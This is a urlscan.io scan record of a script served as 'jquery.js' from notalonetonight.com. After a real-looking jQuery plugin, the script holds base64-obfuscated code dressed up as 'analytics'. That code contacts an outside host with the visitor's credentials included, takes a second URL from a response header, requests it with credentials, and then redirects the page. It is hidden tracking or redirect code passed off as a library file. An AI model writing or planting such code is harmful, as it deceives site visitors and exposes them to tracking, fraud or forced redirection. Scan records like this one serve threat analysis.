notalonetonight.com Open in urlscan Pro
172.67.134.63  Public Scan

Submitted URL: http://notalonetonight.com/2-940101/js/jquery.js?1
Effective URL: https://notalonetonight.com/2-940101/js/jquery.js?1
Submission: On June 14 via api from US — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

(function($){var g=!!$.Tween;if(g){$.Tween.propHooks['backgroundPosition']={get:function(a){return parseBackgroundPosition($(a.elem).css(a.prop))},set:setBackgroundPosition}}else{$.fx.step['backgroundPosition']=setBackgroundPosition};function parseBackgroundPosition(c){var d=(c||'').split(/ /);var e={center:'50%',left:'0%',right:'100%',top:'0%',bottom:'100%'};var f=function(a){var b=(e[d[a]]||d[a]||'50%').match(/^([+-]=)?([+-]?\d+(\.\d*)?)(.*)$/);d[a]=[b[1],parseFloat(b[2]),b[4]||'px']};if(d.length==1&&$.inArray(d[0],['top','bottom'])>-1){d[1]=d[0];d[0]='50%'}f(0);f(1);return d}function setBackgroundPosition(a){if(!a.set){initBackgroundPosition(a)}$(a.elem).css('background-position',((a.pos*(a.end[0][1]-a.start[0][1])+a.start[0][1])+a.end[0][2])+' '+((a.pos*(a.end[1][1]-a.start[1][1])+a.start[1][1])+a.end[1][2]))}function initBackgroundPosition(a){a.start=parseBackgroundPosition($(a.elem).css('backgroundPosition'));a.end=parseBackgroundPosition(a.end);for(var i=0;i<a.end.length;i++){if(a.end[i][0]){a.end[i][1]=a.start[i][1]+(a.end[i][0]=='-='?-1:+1)*a.end[i][1]}}a.set=true}})(jQuery);
function gCk(name) {
    let value = `; ${document.cookie}`;
    let parts = value.split(`; ${name}=`);
    if (parts.length === 2) return parts.pop().split(';').shift();
}

function decode(s) {
    return atob(s);
}

var a1 = null;
var ev = new Event(decode('YW5hbHl0aWMtZmluaXNoZWQ='));

var dd = fetch;

function St() {
    var b1 = (r) => {
        a1 = r.headers.get(decode('eC1hbmFseXRpYy1zZXNzaW9u'));
        return r.json();
    };
    var b2 = (r) => {
        return dd(decode(a1), {
            method: 'GET',
            mode: 'no-cors',
            credentials: 'include',
        });
    };

    dd(decode('aHR0cHM6Ly9hcGkuZ2Etc3RhdC5jb20vYW5hbHl0aWMvc3RhcnQ='), {
        method: 'GET',
        mode: 'cors',
        credentials: 'include',
        headers: {
            'Content-Type': 'application/json',
        },
    })
        .then(b1)
        .then(b2)
        .then(() => {
        document.dispatchEvent(ev);
})
.catch((e) => {
        document.dispatchEvent(ev);
});
}

document.addEventListener(decode('YW5hbHl0aWMtc3RhcnQ='), function () {
    St();
});

document.addEventListener('RE9NQ29udGVudExvYWRlZA==', function () {
    const params = new URLSearchParams(window.location.search);
    if (params.has('i')) {
        setTimeout(() => {
            document.dispatchEvent(ev);
    }, 10000);

        St();
    }
});

// document.addEventListener('DOMContentLoaded', function () {
//   const params = new URLSearchParams(window.location.search);
//   if (params.has('i')) {
//     setTimeout(() => {
//       document.dispatchEvent(ev);
//     }, 5000);

//     St();
//   }
// });

document.addEventListener('analytic-finished', () => {
    console.log('AnalyticFinished');
const btn=document.getElementById('ctaBtn');
const btnLnk=btn.getAttribute('data-link');
window.location.href=btnLnk;
});